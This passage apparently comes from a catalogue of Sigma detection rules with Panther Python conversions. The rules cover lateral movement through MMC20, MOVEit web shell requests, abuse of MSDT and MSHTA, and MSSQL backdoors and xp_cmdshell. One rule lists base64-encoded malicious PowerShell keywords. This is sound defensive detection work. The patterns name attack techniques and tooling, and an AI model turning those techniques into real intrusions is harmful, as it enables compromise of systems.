        - Image|contains: '\BITSADMIN'
    condition: all of selection*
level: high

Convert to SIEM query

high

MMC20 Lateral Movement

Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe

status test author @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) id f1f3bf22-deb2-418d-8cce-e1a45e46a5bd

panther query

def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\svchost.exe"),
            event.deep_get("Image", default="").endswith("\\mmc.exe"),
            "-Embedding" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MMC20 Lateral Movement
id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
status: test
description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
references:
    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
author: '@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)'
date: 2020-03-04
modified: 2021-11-27
tags:
    - attack.execution
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\svchost.exe'
        Image|endswith: '\mmc.exe'
        CommandLine|contains: '-Embedding'
    condition: selection
falsepositives:
    - Unlikely
level: high

Convert to SIEM query

high

MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request

Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362

status test author Nasreddine Bencherchali (Nextron Systems) id 435e41f2-48eb-4c95-8a2b-ed24b50ec30b

panther query

def rule(event):
    if all(
        [
            event.deep_get("cs-method", default="") == "GET",
            any(
                [
                    "/human2.aspx" in event.deep_get("cs-uri-stem", default=""),
                    "/_human2.aspx" in event.deep_get("cs-uri-stem", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
id: 435e41f2-48eb-4c95-8a2b-ed24b50ec30b
status: test
description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
references:
    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
    - https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-03
modified: 2023-07-28
tags:
    - attack.persistence
    - attack.t1505.003
    - cve.2023-34362
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-method: 'GET'
        cs-uri-stem|contains:
            - '/human2.aspx'
            - '/_human2.aspx'
    condition: selection
falsepositives:
    - Unlikely
level: high

Convert to SIEM query

high

MSDT Execution Via Answer File

Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).

status test author Nasreddine Bencherchali (Nextron Systems) id 9c8c7000-3065-44a8-a555-79bcba5d9955

panther query

def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("\\msdt.exe"),
            "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml"
            in event.deep_get("CommandLine", default=""),
            any(
                [
                    " -af " in event.deep_get("CommandLine", default=""),
                    " /af " in event.deep_get("CommandLine", default=""),
                    " –af " in event.deep_get("CommandLine", default=""),
                    " —af " in event.deep_get("CommandLine", default=""),
                    " ―af " in event.deep_get("CommandLine", default=""),
                ]
            ),
            not event.deep_get("ParentImage", default="").endswith("\\pcwrun.exe"),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSDT Execution Via Answer File
id: 9c8c7000-3065-44a8-a555-79bcba5d9955
status: test
description: |
    Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
modified: 2025-10-29
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msdt.exe'
        CommandLine|contains: '\WINDOWS\diagnostics\index\PCWDiagnostic.xml'
        CommandLine|contains|windash: ' -af '
    filter_main_pcwrun:
        ParentImage|endswith: '\pcwrun.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Possible undocumented parents of "msdt" other than "pcwrun".
level: high

Convert to SIEM query

high

MSHTA Execution with Suspicious File Extensions

Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.

status test author Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems) id cc7abbd0-762b-41e3-8a26-57ad50d2eea3

panther query

def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("OriginalFileName", default="") == "mshta.exe",
                ]
            ),
            any(
                [
                    ".7z" in event.deep_get("CommandLine", default=""),
                    ".avi" in event.deep_get("CommandLine", default=""),
                    ".bat" in event.deep_get("CommandLine", default=""),
                    ".bmp" in event.deep_get("CommandLine", default=""),
                    ".conf" in event.deep_get("CommandLine", default=""),
                    ".csv" in event.deep_get("CommandLine", default=""),
                    ".dll" in event.deep_get("CommandLine", default=""),
                    ".doc" in event.deep_get("CommandLine", default=""),
                    ".gif" in event.deep_get("CommandLine", default=""),
                    ".gz" in event.deep_get("CommandLine", default=""),
                    ".ini" in event.deep_get("CommandLine", default=""),
                    ".jpe" in event.deep_get("CommandLine", default=""),
                    ".jpg" in event.deep_get("CommandLine", default=""),
                    ".json" in event.deep_get("CommandLine", default=""),
                    ".lnk" in event.deep_get("CommandLine", default=""),
                    ".log" in event.deep_get("CommandLine", default=""),
                    ".mkv" in event.deep_get("CommandLine", default=""),
                    ".mp3" in event.deep_get("CommandLine", default=""),
                    ".mp4" in event.deep_get("CommandLine", default=""),
                    ".pdf" in event.deep_get("CommandLine", default=""),
                    ".png" in event.deep_get("CommandLine", default=""),
                    ".ppt" in event.deep_get("CommandLine", default=""),
                    ".rar" in event.deep_get("CommandLine", default=""),
                    ".rtf" in event.deep_get("CommandLine", default=""),
                    ".svg" in event.deep_get("CommandLine", default=""),
                    ".tar" in event.deep_get("CommandLine", default=""),
                    ".tmp" in event.deep_get("CommandLine", default=""),
                    ".txt" in event.deep_get("CommandLine", default=""),
                    ".xls" in event.deep_get("CommandLine", default=""),
                    ".xml" in event.deep_get("CommandLine", default=""),
                    ".yaml" in event.deep_get("CommandLine", default=""),
                    ".yml" in event.deep_get("CommandLine", default=""),
                    ".zip" in event.deep_get("CommandLine", default=""),
                    "vbscript" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSHTA Execution with Suspicious File Extensions
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: test
description: |
    Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
references:
    - http://blog.sevagas.com/?Hacking-around-HTA-files
    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
    - https://twitter.com/mattifestation/status/1326228491302563846
    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2019-02-22
modified: 2025-05-12
tags:
    - attack.stealth
    - attack.t1140
    - attack.t1218.005
    - attack.execution
    - attack.t1059.007
    - cve.2020-1599
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\mshta.exe'
        - OriginalFileName: 'mshta.exe'
    selection_cli:
        CommandLine|contains:
            - '.7z'
            - '.avi'
            - '.bat'
            - '.bmp'
            - '.conf'
            - '.csv'
            - '.dll'
            - '.doc'
            - '.gif'
            - '.gz'
            - '.ini'
            - '.jpe'
            - '.jpg'
            - '.json'
            - '.lnk'
            - '.log'
            - '.mkv'
            - '.mp3'
            - '.mp4'
            - '.pdf'
            - '.png'
            - '.ppt'
            - '.rar'
            - '.rtf'
            - '.svg'
            - '.tar'
            - '.tmp'
            - '.txt'
            - '.xls'
            - '.xml'
            - '.yaml'
            - '.yml'
            - '.zip'
            - 'vbscript'
            # - '.chm'  # could be prone to false positives
            # - '.exe'
    condition: all of selection_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high

Convert to SIEM query

high

MSMQ Corrupted Packet Encountered

Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation

status test author Nasreddine Bencherchali (Nextron Systems) id ae94b10d-fee9-4767-82bb-439b309d5a27

panther query

def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "MSMQ",
            event.deep_get("EventID", default="") == 2027,
            event.deep_get("Level", default="") == 2,
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSMQ Corrupted Packet Encountered
id: ae94b10d-fee9-4767-82bb-439b309d5a27
status: test
description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
references:
    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name: 'MSMQ'
        EventID: 2027
        Level: 2
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

MSSQL Add Account To Sysadmin Role

Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role

status test author Nasreddine Bencherchali (Nextron Systems) id 08200f85-2678-463e-9c32-88dce2f073d1

panther query

def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:sysadmin" in event.deep_get("Data", default=""),
            "statement:alter server role [sysadmin] add member "
            in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSSQL Add Account To Sysadmin Role
id: 08200f85-2678-463e-9c32-88dce2f073d1
status: test
description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.persistence
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            - 'object_name:sysadmin'
            - 'statement:alter server role [sysadmin] add member '
    condition: selection
falsepositives:
    - Rare legitimate administrative activity
level: high

Convert to SIEM query

high

MSSQL Disable Audit Settings

Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server

status test author Nasreddine Bencherchali (Nextron Systems) id 350dfb37-3706-4cdc-9e2e-5e24bc3a46df

panther query

def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            any(
                [
                    "statement:ALTER SERVER AUDIT" in event.deep_get("Data", default=""),
                    "statement:DROP SERVER AUDIT" in event.deep_get("Data", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSSQL Disable Audit Settings
id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
status: test
description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
    - https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.defense-impairment
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains:
            - 'statement:ALTER SERVER AUDIT'
            - 'statement:DROP SERVER AUDIT'
    condition: selection
falsepositives:
    - This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up
level: high

Convert to SIEM query

high

MSSQL Extended Stored Procedure Backdoor Maggie

This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server

status test author Denis Szadkowski, DIRT / DCSO CyTec id 711ab2fe-c9ba-4746-8840-5228a58c3cb8

panther query

def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "MSSQLSERVER",
            event.deep_get("EventID", default="") == 8128,
            "maggie" in event.deep_get("Message", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSSQL Extended Stored Procedure Backdoor Maggie
id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8
status: test
description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
references:
    - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
author: Denis Szadkowski, DIRT / DCSO CyTec
date: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546
    - detection.emerging-threats
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name: 'MSSQLSERVER'
        EventID: 8128
        Message|contains: 'maggie'
    condition: selection
falsepositives:
    - Legitimate extended stored procedures named maggie
level: high

Convert to SIEM query

high

MSSQL SPProcoption Set

Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started

status test author Nasreddine Bencherchali (Nextron Systems) id b3d57a5c-c92e-4b48-9a79-5f124b7cf964

panther query

def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:sp_procoption" in event.deep_get("Data", default=""),
            "statement:EXEC" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSSQL SPProcoption Set
id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964
status: test
description: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.persistence
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy to monitor for "sp_procoption" must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            - 'object_name:sp_procoption'
            - 'statement:EXEC'
    condition: selection
falsepositives:
    - Legitimate use of the feature by administrators (rare)
level: high

Convert to SIEM query

high

MSSQL XPCmdshell Option Change

Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.

status test author Nasreddine Bencherchali (Nextron Systems) id d08dd86f-681e-4a00-a92c-1db218754417

panther query

def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 15457,
            "xp_cmdshell" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSSQL XPCmdshell Option Change
id: d08dd86f-681e-4a00-a92c-1db218754417
status: test
description: |
    Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
    - attack.execution
logsource:
    product: windows
    service: application
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 15457
        Data|contains: 'xp_cmdshell'
    condition: selection
falsepositives:
    - Legitimate enable/disable of the setting
    - Note that since the event contain the change for both values. This means that this will trigger on both enable and disable
level: high

Convert to SIEM query

high

MSSQL XPCmdshell Suspicious Execution

Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands

status test author Nasreddine Bencherchali (Nextron Systems) id 7f103213-a04e-4d59-8261-213dddf22314

panther query

def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:xp_cmdshell" in event.deep_get("Data", default=""),
            "statement:EXEC" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MSSQL XPCmdshell Suspicious Execution
id: 7f103213-a04e-4d59-8261-213dddf22314
status: test
description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
    - attack.execution
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy to monitor for "xp_cmdshell" must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            # You can modify this to include specific commands
            - 'object_name:xp_cmdshell'
            - 'statement:EXEC'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Macro Enabled In A Potentially Suspicious Document

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

status test author Nasreddine Bencherchali (Nextron Systems) id a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd

panther query

def rule(event):
    if all(
        [
            "\\Security\\Trusted Documents\\TrustRecords"
            in event.deep_get("TargetObject", default=""),
            any(
                [
                    "/AppData/Local/Microsoft/Windows/INetCache/"
                    in event.deep_get("TargetObject", default=""),
                    "/AppData/Local/Temp/" in event.deep_get("TargetObject", default=""),
                    "/PerfLogs/" in event.deep_get("TargetObject", default=""),
                    "C:/Users/Public/" in event.deep_get("TargetObject", default=""),
                    "file:///D:/" in event.deep_get("TargetObject", default=""),
                    "file:///E:/" in event.deep_get("TargetObject", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Macro Enabled In A Potentially Suspicious Document
id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
related:
    - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
      type: derived
status: test
description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
references:
    - https://twitter.com/inversecos/status/1494174785621819397
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-21
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection_value:
        TargetObject|contains: '\Security\Trusted Documents\TrustRecords'
    selection_paths:
        TargetObject|contains:
            # Note: add more locations where you don't expect a user to executed macro enabled docs
            - '/AppData/Local/Microsoft/Windows/INetCache/'
            - '/AppData/Local/Temp/'
            - '/PerfLogs/'
            - 'C:/Users/Public/'
            - 'file:///D:/'
            - 'file:///E:/'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high

Convert to SIEM query

high

Malicious Base64 Encoded PowerShell Keywords in Command Lines

Detects base64 encoded strings used in hidden malicious PowerShell command lines

status test author John Lambert (rule) id f26c6093-6f14-4b12-800f-0fcb46f5ffd0

panther query

def rule(event):
    if all(
        [
            any(
                [
                    any(
                        [
                            event.deep_get("Image", default="").endswith("\\powershell.exe"),
                            event.deep_get("Image", default="").endswith("\\pwsh.exe"),
                        ]
                    ),
                    event.deep_get("OriginalFileName", default="")
                    in ["PowerShell.EXE", "pwsh.dll"],
                ]
            ),
            " hidden " in event.deep_get("CommandLine", default=""),
            any(
                [
                    "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA"
                    in event.deep_get("CommandLine", default=""),
                    "aXRzYWRtaW4gL3RyYW5zZmVy" in event.deep_get("CommandLine", default=""),
                    "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA"
                    in event.deep_get("CommandLine", default=""),
                    "JpdHNhZG1pbiAvdHJhbnNmZX" in event.deep_get("CommandLine", default=""),
                    "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg"
                    in event.deep_get("CommandLine", default=""),
                    "Yml0c2FkbWluIC90cmFuc2Zlc" in event.deep_get("CommandLine", default=""),
                    "AGMAaAB1AG4AawBfAHMAaQB6AGUA" in event.deep_get("CommandLine", default=""),
                    "JABjAGgAdQBuAGsAXwBzAGkAegBlA" in event.deep_get("CommandLine", default=""),
                    "JGNodW5rX3Npem" in event.deep_get("CommandLine", default=""),
                    "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" in event.deep_get("CommandLine", default=""),
                    "RjaHVua19zaXpl" in event.deep_get("CommandLine", default=""),
                    "Y2h1bmtfc2l6Z" in event.deep_get("CommandLine", default=""),
                    "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A"
                    in event.deep_get("CommandLine", default=""),
                    "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg"
                    in event.deep_get("CommandLine", default=""),
                    "lPLkNvbXByZXNzaW9u" in event.deep_get("CommandLine", default=""),
                    "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA"
                    in event.deep_get("CommandLine", default=""),
                    "SU8uQ29tcHJlc3Npb2" in event.deep_get("CommandLine", default=""),
                    "Ty5Db21wcmVzc2lvb" in event.deep_get("CommandLine", default=""),
                    "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ"
                    in event.deep_get("CommandLine", default=""),
                    "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA"
                    in event.deep_get("CommandLine", default=""),
                    "lPLk1lbW9yeVN0cmVhb" in event.deep_get("CommandLine", default=""),
                    "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A"
                    in event.deep_get("CommandLine", default=""),
                    "SU8uTWVtb3J5U3RyZWFt" in event.deep_get("CommandLine", default=""),
                    "Ty5NZW1vcnlTdHJlYW" in event.deep_get("CommandLine", default=""),
                    "4ARwBlAHQAQwBoAHUAbgBrA" in event.deep_get("CommandLine", default=""),
                    "5HZXRDaHVua" in event.deep_get("CommandLine", default=""),
                    "AEcAZQB0AEMAaAB1AG4Aaw" in event.deep_get("CommandLine", default=""),
                    "LgBHAGUAdABDAGgAdQBuAGsA" in event.deep_get("CommandLine", default=""),
                    "LkdldENodW5r" in event.deep_get("CommandLine", default=""),
                    "R2V0Q2h1bm" in event.deep_get("CommandLine", default=""),
                    "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A"
                    in event.deep_get("CommandLine", default=""),
                    "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA"
                    in event.deep_get("CommandLine", default=""),
                    "RIUkVBRF9JTkZPNj" in event.deep_get("CommandLine", default=""),
                    "SFJFQURfSU5GTzY0" in event.deep_get("CommandLine", default=""),
                    "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA"
                    in event.deep_get("CommandLine", default=""),
                    "VEhSRUFEX0lORk82N" in event.deep_get("CommandLine", default=""),
                    "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA"
                    in event.deep_get("CommandLine", default=""),
                    "cmVhdGVSZW1vdGVUaHJlYW" in event.deep_get("CommandLine", default=""),
                    "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA"
                    in event.deep_get("CommandLine", default=""),
                    "NyZWF0ZVJlbW90ZVRocmVhZ" in event.deep_get("CommandLine", default=""),
                    "Q3JlYXRlUmVtb3RlVGhyZWFk" in event.deep_get("CommandLine", default=""),
                    "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA"
                    in event.deep_get("CommandLine", default=""),
                    "0AZQBtAG0AbwB2AGUA" in event.deep_get("CommandLine", default=""),
                    "1lbW1vdm" in event.deep_get("CommandLine", default=""),
                    "AGUAbQBtAG8AdgBlA" in event.deep_get("CommandLine", default=""),
                    "bQBlAG0AbQBvAHYAZQ" in event.deep_get("CommandLine", default=""),
                    "bWVtbW92Z" in event.deep_get("CommandLine", default=""),
                    "ZW1tb3Zl" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0
status: test
description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
references:
    - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
author: John Lambert (rule)
date: 2019-01-16
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_hidden:
        CommandLine|contains: ' hidden '
    selection_encoded:
        CommandLine|contains:
            - 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'
            - 'aXRzYWRtaW4gL3RyYW5zZmVy'
            - 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'
            - 'JpdHNhZG1pbiAvdHJhbnNmZX'
            - 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'
            - 'Yml0c2FkbWluIC90cmFuc2Zlc'
            - 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'
            - 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'
            - 'JGNodW5rX3Npem'
            - 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'
            - 'RjaHVua19zaXpl'
            - 'Y2h1bmtfc2l6Z'
            - 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'
            - 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'
            - 'lPLkNvbXByZXNzaW9u'
            - 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'
            - 'SU8uQ29tcHJlc3Npb2'
            - 'Ty5Db21wcmVzc2lvb'
            - 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'
            - 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'
            - 'lPLk1lbW9yeVN0cmVhb'
            - 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'
            - 'SU8uTWVtb3J5U3RyZWFt'
            - 'Ty5NZW1vcnlTdHJlYW'
            - '4ARwBlAHQAQwBoAHUAbgBrA'
            - '5HZXRDaHVua'
            - 'AEcAZQB0AEMAaAB1AG4Aaw'
            - 'LgBHAGUAdABDAGgAdQBuAGsA'
            - 'LkdldENodW5r'
            - 'R2V0Q2h1bm'
            - 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'
            - 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'
            - 'RIUkVBRF9JTkZPNj'
            - 'SFJFQURfSU5GTzY0'
            - 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'
            - 'VEhSRUFEX0lORk82N'
            - 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'
            - 'cmVhdGVSZW1vdGVUaHJlYW'
